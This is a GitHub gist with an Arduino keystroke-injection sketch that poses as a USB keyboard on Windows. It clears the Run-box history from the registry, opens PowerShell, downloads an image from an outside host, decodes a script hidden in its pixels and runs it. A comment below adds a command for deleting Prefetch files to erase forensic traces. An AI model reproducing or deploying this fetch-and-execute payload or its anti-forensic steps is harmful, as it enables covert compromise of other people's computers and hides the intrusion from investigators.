Created
February 17, 2022 15:38
-
-
Save OlivierLaflamme/c6a036f8c23fa705e9f0d2ecab47afef to your computer and use it in GitHub Desktop.
Preliminary Invoke-PSImage for twitter
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <HID.h> | |
| #include <Keyboard.h> | |
| void setup() {//initialization | |
| Keyboard.begin();//Start keyboard communication | |
| delay(5000);//delay | |
| Keyboard.press(KEY_LEFT_GUI);//win key | |
| delay(500); | |
| Keyboard.press('r');//r key | |
| delay(500); | |
| Keyboard.release(KEY_LEFT_GUI); | |
| Keyboard.release('r'); | |
| delay(500); | |
| Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1® delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); | |
| delay(500); | |
| Keyboard.println("Powershell"); | |
| Keyboard.press(KEY_RETURN); | |
| delay(500); | |
| Keyboard.release(KEY_RETURN); | |
| Keyboard.println("sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead('https://www.png8.com/imgs/2021/11/<snip>.png'));$o=a Byte[] 354000;(0..353)|%{foreach($x in(0..999)){$p=$g.GetPixel($x,$_);$o[$_*1000+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..353266]))"); | |
| Keyboard.press(KEY_RETURN); | |
| delay(10000); | |
| Keyboard.release(KEY_RETURN); | |
| Keyboard.press(KEY_RETURN); | |
| delay(5000); | |
| Keyboard.release(KEY_RETURN); | |
| Keyboard.println('exit'); | |
| Keyboard.press(KEY_LEFT_GUI); | |
| delay(500); | |
| Keyboard.press('m'); | |
| delay(500); | |
| Keyboard.release(KEY_LEFT_GUI); | |
| Keyboard.release('m'); | |
| Keyboard.end();//End keyboard communication | |
| } | |
| void loop()//loop | |
| { | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
0 OPSEC consideration. You'll have to remove the generated Prefetech Files
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])and so so so so much more lol so have fun but you can do something somewhat stylish.